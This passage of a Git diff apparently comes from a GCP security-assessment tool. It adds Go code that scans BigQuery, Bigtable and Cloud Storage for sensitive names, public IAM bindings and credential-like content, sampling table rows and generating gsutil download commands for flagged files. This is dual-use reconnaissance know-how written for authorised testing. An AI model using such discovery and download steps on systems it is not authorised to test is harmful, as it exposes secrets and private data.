Dataset: datasetID, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Dataset name: %s", match.Description), + }) + } + + // List tables in dataset + tablesResp, err := service.Tables.List(projectID, datasetID).Context(ctx).Do() + if err != nil { + continue + } + + for _, tbl := range tablesResp.Tables { + if maxTables > 0 && tableCount >= maxTables { + break + } 
+ tableCount++ + + tableID := tbl.TableReference.TableId + + // Check table name + if match := shared.MatchResourceName(tableID, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Get table schema to check column names + tableDetail, err := service.Tables.Get(projectID, datasetID, tableID).Context(ctx).Do() + if err != nil { + continue + } + + if tableDetail.Schema != nil { + for _, field := range tableDetail.Schema.Fields { + if match := shared.MatchResourceName(field.Name, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + Column: field.Name, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column name: %s", match.Description), + }) + } + } + } + + // Phase 2: Optional data sampling + if sampleData && wasTableFlagged(resources, projectID, datasetID, tableID) { + sampleResults := s.sampleTableData(ctx, service, projectID, datasetID, tableID, maxRows, contentPatterns) + resources = append(resources, sampleResults...) + } + } + + if maxTables > 0 && tableCount >= maxTables { + break + } + } + + return resources, nil +} + +// wasTableFlagged checks if a table was already flagged by name matching. +func wasTableFlagged(resources []SensitiveBQResource, projectID, dataset, table string) bool { + for _, r := range resources { + if r.ProjectID == projectID && r.Dataset == dataset && r.Table == table { + return true + } + } + return false +} + +// sampleTableData runs a SELECT query on a flagged table and scans results. 
+func (s *BigQueryEnumService) sampleTableData(ctx context.Context, service *bigquery.Service, projectID, datasetID, tableID string, maxRows int, patterns []shared.ContentPattern) []SensitiveBQResource {
+	var results []SensitiveBQResource
+
+	query := fmt.Sprintf("SELECT * FROM `%s.%s.%s` LIMIT %d", projectID, datasetID, tableID, maxRows)
+
+	useLegacySQL := false
+	job := &bigquery.Job{
+		Configuration: &bigquery.JobConfiguration{
+			Query: &bigquery.JobConfigurationQuery{
+				Query:           query,
+				UseLegacySql:    &useLegacySQL,
+				ForceSendFields: []string{"UseLegacySql"},
+			},
+		},
+	}
+
+	insertedJob, err := service.Jobs.Insert(projectID, job).Context(ctx).Do()
+	if err != nil {
+		return results
+	}
+
+	// Wait for query to complete (simple polling)
+	for {
+		status, err := service.Jobs.Get(projectID, insertedJob.JobReference.JobId).Context(ctx).Do()
+		if err != nil {
+			return results
+		}
+		if status.Status.State == "DONE" {
+			if status.Status.ErrorResult != nil {
+				return results
+			}
+			break
+		}
+	}
+
+	// Get results
+	queryResults, err := service.Jobs.GetQueryResults(projectID, insertedJob.JobReference.JobId).Context(ctx).Do()
+	if err != nil {
+		return results
+	}
+
+	// Scan each row
+	for _, row := range queryResults.Rows {
+		for _, cell := range row.F {
+			cellStr := fmt.Sprintf("%v", cell.V)
+			if cellStr == "" || cellStr == "<nil>" {
+				continue
+			}
+			matches := shared.MatchContent(cellStr, patterns)
+			for _, match := range matches {
+				results = append(results, SensitiveBQResource{
+					ProjectID:   projectID,
+					Dataset:     datasetID,
+					Table:       tableID,
+					MatchType:   "content",
+					Category:    match.Category,
+					RiskLevel:   match.RiskLevel,
+					Description: fmt.Sprintf("Data content: %s", match.Description),
+				})
+				break // One match per cell is sufficient
+			}
+		}
+	}
+
+	// Deduplicate content matches per table
+	return deduplicateByCategory(results)
+}
+
+func deduplicateByCategory(resources []SensitiveBQResource) []SensitiveBQResource {
+	seen := make(map[string]bool)
+	var result 
[]SensitiveBQResource + for _, r := range resources { + key := strings.Join([]string{r.ProjectID, r.Dataset, r.Table, r.Category, r.MatchType}, "|") + if !seen[key] { + seen[key] = true + result = append(result, r) + } + } + return result +} diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 426cb03f..197b7026 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -2,33 +2,102 @@ package bigqueryservice import ( "context" + "fmt" + "strings" "time" "cloud.google.com/go/bigquery" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" + bqapi "google.golang.org/api/bigquery/v2" ) -// BigqueryDataset represents a dataset in BigQuery +// AccessEntry represents an access control entry on a dataset +type AccessEntry struct { + Role string `json:"role"` // OWNER, WRITER, READER + EntityType string `json:"entityType"` // User, Group, Domain, ServiceAccount, etc. 
+ Entity string `json:"entity"` // The actual entity identifier +} + +// BigqueryDataset represents a dataset in BigQuery with security-relevant fields type BigqueryDataset struct { - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - Description string - Name string - ProjectID string + // Basic info + DatasetID string `json:"datasetID"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + + // Security-relevant fields + DefaultTableExpiration time.Duration `json:"defaultTableExpiration"` + DefaultPartitionExpiration time.Duration `json:"defaultPartitionExpiration"` + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + Labels map[string]string `json:"labels"` + StorageBillingModel string `json:"storageBillingModel"` + MaxTimeTravel time.Duration `json:"maxTimeTravel"` + + // Access control (IAM-like) + AccessEntries []AccessEntry `json:"accessEntries"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" } -// BigqueryTable represents a table in BigQuery +// BigqueryTable represents a table in BigQuery with security-relevant fields type BigqueryTable struct { - TableID string - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - NumBytes int64 - Description string - ProjectID string + // Basic info + TableID string `json:"tableID"` + DatasetID string `json:"datasetID"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + Description string `json:"description"` + TableType string 
`json:"tableType"` // TABLE, VIEW, MATERIALIZED_VIEW, EXTERNAL, SNAPSHOT + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + ExpirationTime time.Time `json:"expirationTime"` + + // Size info + NumBytes int64 `json:"numBytes"` + NumLongTermBytes int64 `json:"numLongTermBytes"` + NumRows uint64 `json:"numRows"` + + // Security-relevant fields + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` + Labels map[string]string `json:"labels"` + RequirePartitionFilter bool `json:"requirePartitionFilter"` + + // Partitioning info + IsPartitioned bool `json:"isPartitioned"` + PartitioningType string `json:"partitioningType"` // "TIME" or "RANGE" + + // View info + IsView bool `json:"isView"` + ViewQuery string `json:"viewQuery"` + UseLegacySQL bool `json:"useLegacySQL"` + + // Streaming info + HasStreamingBuffer bool `json:"hasStreamingBuffer"` + + // IAM bindings (table-level) + IAMBindings []TableIAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` + PublicAccess string `json:"publicAccess"` +} + +// TableIAMBinding represents an IAM binding on a table +type TableIAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` } // CombinedBigqueryData represents both datasets and tables within a project @@ -38,14 +107,27 @@ type CombinedBigqueryData struct { } type BigQueryService struct { - // Placeholder for any required services or configuration + session *gcpinternal.SafeSession } -// New creates a new instance of BigQueryService +// New creates a new instance of BigQueryService (legacy - uses ADC directly) func New() *BigQueryService { return &BigQueryService{} } +// NewWithSession creates a BigQueryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryService { + return &BigQueryService{session: session} +} + +// getService returns a 
BigQuery REST API service client using cached session if available +func (bq *BigQueryService) getService(ctx context.Context) (*bqapi.Service, error) { + if bq.session != nil { + return sdk.CachedGetBigQueryService(ctx, bq.session) + } + return bqapi.NewService(ctx) +} + // gcloud alpha bq datasets list // gcloud alpha bq datasets describe terragoat_dev_dataset // gcloud alpha bq tables list --dataset terragoat_dev_dataset @@ -78,9 +160,16 @@ func (bq *BigQueryService) BigqueryDatasetsAndTables(projectID string) (Combined // BigqueryDatasets retrieves datasets from the given projectID across all locations func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() @@ -92,34 +181,155 @@ func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := ds.Metadata(ctx) if err != nil { - return nil, err - } - datasets = append(datasets, BigqueryDataset{ - DatasetID: ds.DatasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - Description: meta.Description, - Name: meta.Name, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + dataset := BigqueryDataset{ + DatasetID: ds.DatasetID, + Name: meta.Name, + Description: meta.Description, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + CreationTime: meta.CreationTime, + LastModifiedTime: 
meta.LastModifiedTime, + DefaultTableExpiration: meta.DefaultTableExpiration, + DefaultPartitionExpiration: meta.DefaultPartitionExpiration, + Labels: meta.Labels, + StorageBillingModel: meta.StorageBillingModel, + MaxTimeTravel: meta.MaxTimeTravel, + } + + // Parse encryption + if meta.DefaultEncryptionConfig != nil && meta.DefaultEncryptionConfig.KMSKeyName != "" { + dataset.EncryptionType = "CMEK" + dataset.KMSKeyName = meta.DefaultEncryptionConfig.KMSKeyName + } else { + dataset.EncryptionType = "Google-managed" + } + + // Parse access entries + accessEntries, isPublic, publicAccess := parseDatasetAccess(meta.Access) + dataset.AccessEntries = accessEntries + dataset.IsPublic = isPublic + dataset.PublicAccess = publicAccess + + datasets = append(datasets, dataset) } return datasets, nil } +// parseDatasetAccess converts BigQuery access entries to our format and checks for public access +func parseDatasetAccess(access []*bigquery.AccessEntry) ([]AccessEntry, bool, string) { + var entries []AccessEntry + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + for _, a := range access { + if a == nil { + continue + } + + entry := AccessEntry{ + Role: string(a.Role), + EntityType: entityTypeToString(a.EntityType), + Entity: a.Entity, + } + + // Check for special access (views, routines, datasets) + if a.View != nil { + entry.EntityType = "View" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.View.ProjectID, a.View.DatasetID, a.View.TableID) + } + if a.Routine != nil { + entry.EntityType = "Routine" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.Routine.ProjectID, a.Routine.DatasetID, a.Routine.RoutineID) + } + if a.Dataset != nil { + entry.EntityType = "Dataset" + entry.Entity = fmt.Sprintf("%s.%s", a.Dataset.Dataset.ProjectID, a.Dataset.Dataset.DatasetID) + } + + // Check for public access + if a.EntityType == bigquery.SpecialGroupEntity { + if a.Entity == "allUsers" || strings.Contains(strings.ToLower(a.Entity), "allusers") { + hasAllUsers = true + 
isPublic = true + } + if a.Entity == "allAuthenticatedUsers" || strings.Contains(strings.ToLower(a.Entity), "allauthenticatedusers") { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + + entries = append(entries, entry) + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return entries, isPublic, publicAccess +} + +// entityTypeToString converts BigQuery EntityType to a readable string +func entityTypeToString(et bigquery.EntityType) string { + switch et { + case bigquery.DomainEntity: + return "Domain" + case bigquery.GroupEmailEntity: + return "Group" + case bigquery.UserEmailEntity: + return "User" + case bigquery.SpecialGroupEntity: + return "SpecialGroup" + case bigquery.ViewEntity: + return "View" + case bigquery.IAMMemberEntity: + return "IAMMember" + case bigquery.RoutineEntity: + return "Routine" + case bigquery.DatasetEntity: + return "Dataset" + default: + return "Unknown" + } +} + // BigqueryTables retrieves tables from the given projectID and dataset across all locations func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([]BigqueryTable, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() + // Create API service for IAM calls using cached wrapper + apiService, err := bq.getService(ctx) + if err != nil { + // Continue without IAM if service creation fails + apiService = nil + } + var 
tables []BigqueryTable ds := client.Dataset(datasetID) it := ds.Tables(ctx) @@ -129,22 +339,173 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := table.Metadata(ctx) if err != nil { - return nil, err - } - tables = append(tables, BigqueryTable{ - TableID: table.TableID, - DatasetID: datasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - NumBytes: meta.NumBytes, - Description: meta.Description, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + tbl := BigqueryTable{ + TableID: table.TableID, + DatasetID: datasetID, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + Description: meta.Description, + TableType: tableTypeToString(meta.Type), + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + ExpirationTime: meta.ExpirationTime, + NumBytes: meta.NumBytes, + NumLongTermBytes: meta.NumLongTermBytes, + NumRows: meta.NumRows, + Labels: meta.Labels, + RequirePartitionFilter: meta.RequirePartitionFilter, + } + + // Parse encryption + if meta.EncryptionConfig != nil && meta.EncryptionConfig.KMSKeyName != "" { + tbl.EncryptionType = "CMEK" + tbl.KMSKeyName = meta.EncryptionConfig.KMSKeyName + } else { + tbl.EncryptionType = "Google-managed" + } + + // Parse partitioning + if meta.TimePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "TIME" + } else if meta.RangePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "RANGE" + } + + // Parse view info + if meta.ViewQuery != "" { + tbl.IsView = true + tbl.ViewQuery = meta.ViewQuery + tbl.UseLegacySQL = meta.UseLegacySQL + } + + // Check for streaming buffer + if meta.StreamingBuffer != nil { + tbl.HasStreamingBuffer = true + } + + // Get table-level IAM 
policy + if apiService != nil { + iamBindings, isPublic, publicAccess := bq.getTableIAMPolicy(ctx, apiService, projectID, datasetID, table.TableID) + tbl.IAMBindings = iamBindings + tbl.IsPublic = isPublic + tbl.PublicAccess = publicAccess + } + + tables = append(tables, tbl) } return tables, nil } + +// getTableIAMPolicy retrieves IAM policy for a specific table +func (bq *BigQueryService) getTableIAMPolicy(ctx context.Context, apiService *bqapi.Service, projectID, datasetID, tableID string) ([]TableIAMBinding, bool, string) { + var bindings []TableIAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + resource := fmt.Sprintf("projects/%s/datasets/%s/tables/%s", projectID, datasetID, tableID) + policy, err := apiService.Tables.GetIamPolicy(resource, &bqapi.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // IAM not available or permission denied - return empty + return bindings, false, "None" + } + + for _, binding := range policy.Bindings { + iamBinding := TableIAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// tableTypeToString converts BigQuery TableType to a readable string +func tableTypeToString(tt bigquery.TableType) string { + switch tt { + case bigquery.RegularTable: + return "TABLE" + case bigquery.ViewTable: + return "VIEW" + case bigquery.ExternalTable: + 
return "EXTERNAL" + case bigquery.MaterializedView: + return "MATERIALIZED_VIEW" + case bigquery.Snapshot: + return "SNAPSHOT" + default: + return "UNKNOWN" + } +} + +// GetMemberType extracts the member type from entity info +func GetMemberType(entityType string, entity string) string { + switch entityType { + case "User": + return "User" + case "Group": + return "Group" + case "Domain": + return "Domain" + case "SpecialGroup": + if strings.Contains(strings.ToLower(entity), "allusers") { + return "PUBLIC" + } + if strings.Contains(strings.ToLower(entity), "allauthenticatedusers") { + return "ALL_AUTHENTICATED" + } + return "SpecialGroup" + case "IAMMember": + if strings.HasPrefix(entity, "serviceAccount:") { + return "ServiceAccount" + } + if strings.HasPrefix(entity, "user:") { + return "User" + } + if strings.HasPrefix(entity, "group:") { + return "Group" + } + return "IAMMember" + case "View": + return "AuthorizedView" + case "Routine": + return "AuthorizedRoutine" + case "Dataset": + return "AuthorizedDataset" + default: + return "Unknown" + } +} diff --git a/gcp/services/bigtableEnumService/bigtableEnumService.go b/gcp/services/bigtableEnumService/bigtableEnumService.go new file mode 100644 index 00000000..6f170632 --- /dev/null +++ b/gcp/services/bigtableEnumService/bigtableEnumService.go @@ -0,0 +1,121 @@ +package bigtableenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableEnumService { + return &BigtableEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigtableEnumService { + return &BigtableEnumService{session: session} +} + +// SensitiveBTResource represents a Bigtable resource flagged as potentially sensitive. 
+type SensitiveBTResource struct { + ProjectID string `json:"projectId"` + Instance string `json:"instance"` + Table string `json:"table"` + ColumnFamily string `json:"columnFamily"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getBigtableAdminService returns a Bigtable Admin service client. +func (s *BigtableEnumService) getBigtableAdminService(ctx context.Context) (*bigtableadmin.Service, error) { + return bigtableadmin.NewService(ctx) +} + +// EnumerateSensitiveResources scans Bigtable metadata for sensitive resource names. +func (s *BigtableEnumService) EnumerateSensitiveResources(projectID string) ([]SensitiveBTResource, error) { + ctx := context.Background() + + service, err := s.getBigtableAdminService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + var resources []SensitiveBTResource + + // List instances + parent := fmt.Sprintf("projects/%s", projectID) + instancesResp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + for _, instance := range instancesResp.Instances { + instanceName := extractName(instance.Name) + + // Check instance name + if match := shared.MatchResourceName(instanceName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Instance name: %s", match.Description), + }) + } + + // List tables + tablesResp, err := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if err != nil { + continue + } + + for _, table := range tablesResp.Tables { + tableName := extractName(table.Name) + + // Check table name + if match := shared.MatchResourceName(tableName, 
namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Table: tableName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Check column family names + for cfName := range table.ColumnFamilies { + if match := shared.MatchResourceName(cfName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Table: tableName, + ColumnFamily: cfName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column family name: %s", match.Description), + }) + } + } + } + } + + return resources, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go new file mode 100644 index 00000000..8a915ec7 --- /dev/null +++ b/gcp/services/bigtableService/bigtableService.go @@ -0,0 +1,178 @@ +package bigtableservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableService { + return &BigtableService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigtableService { + return &BigtableService{ + session: session, + } +} + +type BigtableInstanceInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Type string `json:"type"` + State string `json:"state"` + Clusters []ClusterInfo `json:"clusters"` + IAMBindings []IAMBinding 
`json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type BigtableTableInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + InstanceName string `json:"instanceName"` + ProjectID string `json:"projectId"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +type ClusterInfo struct { + Name string `json:"name"` + Location string `json:"location"` + ServeNodes int64 `json:"serveNodes"` + State string `json:"state"` +} + +type BigtableResult struct { + Instances []BigtableInstanceInfo + Tables []BigtableTableInfo +} + +// getService returns a Bigtable Admin service client using cached session if available +func (s *BigtableService) getService(ctx context.Context) (*bigtableadmin.Service, error) { + if s.session != nil { + return sdk.CachedGetBigtableAdminService(ctx, s.session) + } + return bigtableadmin.NewService(ctx) +} + +func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + result := &BigtableResult{ + Instances: []BigtableInstanceInfo{}, + Tables: []BigtableTableInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + resp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + for _, instance := range resp.Instances { + info := BigtableInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Type: instance.Type, + State: instance.State, + } + + // Get clusters + clustersResp, clusterErr := service.Projects.Instances.Clusters.List(instance.Name).Context(ctx).Do() + if clusterErr == nil 
&& clustersResp != nil { + for _, cluster := range clustersResp.Clusters { + info.Clusters = append(info.Clusters, ClusterInfo{ + Name: extractName(cluster.Name), + Location: cluster.Location, + ServeNodes: cluster.ServeNodes, + State: cluster.State, + }) + } + } + + // Get tables and their IAM policies + tablesResp, tableErr := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if tableErr == nil && tablesResp != nil { + for _, table := range tablesResp.Tables { + tableInfo := BigtableTableInfo{ + Name: extractName(table.Name), + FullName: table.Name, + InstanceName: info.Name, + ProjectID: projectID, + } + + // Get IAM policy for table + tableIamResp, err := service.Projects.Instances.Tables.GetIamPolicy(table.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && tableIamResp != nil { + for _, binding := range tableIamResp.Bindings { + tableInfo.IAMBindings = append(tableInfo.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + tableInfo.PublicAccess = checkPublicAccess(tableIamResp.Bindings) + } + + result.Tables = append(result.Tables, tableInfo) + } + } + + // Get IAM policy for instance + iamResp, err := service.Projects.Instances.GetIamPolicy(instance.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && iamResp != nil { + for _, binding := range iamResp.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + info.PublicAccess = checkPublicAccess(iamResp.Bindings) + } + + result.Instances = append(result.Instances, info) + } + + return result, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// checkPublicAccess checks if any IAM binding grants access to allUsers or allAuthenticatedUsers +func checkPublicAccess(bindings []*bigtableadmin.Binding) bool { + 
for _, binding := range bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return true + } + } + } + return false +} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go new file mode 100644 index 00000000..14b3492a --- /dev/null +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -0,0 +1,238 @@ +package bucketenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + "google.golang.org/api/iterator" + "google.golang.org/api/storage/v1" +) + +type BucketEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BucketEnumService { + return &BucketEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BucketEnumService { + return &BucketEnumService{session: session} +} + +// getStorageService returns a Storage service client using cached session if available +func (s *BucketEnumService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + +// SensitiveFileInfo represents a potentially sensitive file in a bucket +type SensitiveFileInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Category string `json:"category"` // credential, secret, config, backup, etc. 
+ RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + Description string `json:"description"` // Why it's sensitive + DownloadCmd string `json:"downloadCmd"` // gsutil command to download + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` // Whether the object has public access + Encryption string `json:"encryption"` // Encryption type (Google-managed or CMEK key name) +} + +// EnumerateBucketSensitiveFiles lists potentially sensitive files in a bucket +func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID string, maxObjects int) ([]SensitiveFileInfo, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var sensitiveFiles []SensitiveFileInfo + patterns := shared.GetFilePatterns() + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + if maxObjects > 0 { + req = req.MaxResults(int64(maxObjects)) + } + + err = req.Pages(ctx, func(objects *storage.Objects) error { + for _, obj := range objects.Items { + // Check against sensitive patterns + if info := s.checkObjectSensitivity(obj, bucketName, projectID, patterns); info != nil { + sensitiveFiles = append(sensitiveFiles, *info) + } + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return sensitiveFiles, nil +} + +func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketName, projectID string, patterns []shared.SensitivePattern) *SensitiveFileInfo { + if obj == nil { + return nil + } + + match := shared.MatchFileName(obj.Name, patterns) + if match == nil { + return nil + } + + isPublic := s.isObjectPublic(obj) + + return &SensitiveFileInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + 
ContentType: obj.ContentType, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: match.Description, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + Encryption: s.getObjectEncryption(obj), + } +} + +// isObjectPublic checks if an object has public access via ACLs +func (s *BucketEnumService) isObjectPublic(obj *storage.Object) bool { + if obj == nil || obj.Acl == nil { + return false + } + + for _, acl := range obj.Acl { + // Check for public access entities + if acl.Entity == "allUsers" || acl.Entity == "allAuthenticatedUsers" { + return true + } + } + + return false +} + +// getObjectEncryption returns the encryption type for an object +// Returns "CMEK (key-name)" if using customer-managed key, or "Google-managed" otherwise +func (s *BucketEnumService) getObjectEncryption(obj *storage.Object) string { + if obj == nil { + return "Google-managed" + } + + // Check if the object uses a customer-managed encryption key (CMEK) + if obj.KmsKeyName != "" { + // Extract just the key name from the full resource path + // Format: projects/{project}/locations/{location}/keyRings/{keyRing}/cryptoKeys/{key}/cryptoKeyVersions/{version} + keyParts := strings.Split(obj.KmsKeyName, "/") + if len(keyParts) >= 8 { + // Get the key name (index 7 is cryptoKeys/{key}) + keyName := keyParts[7] + return 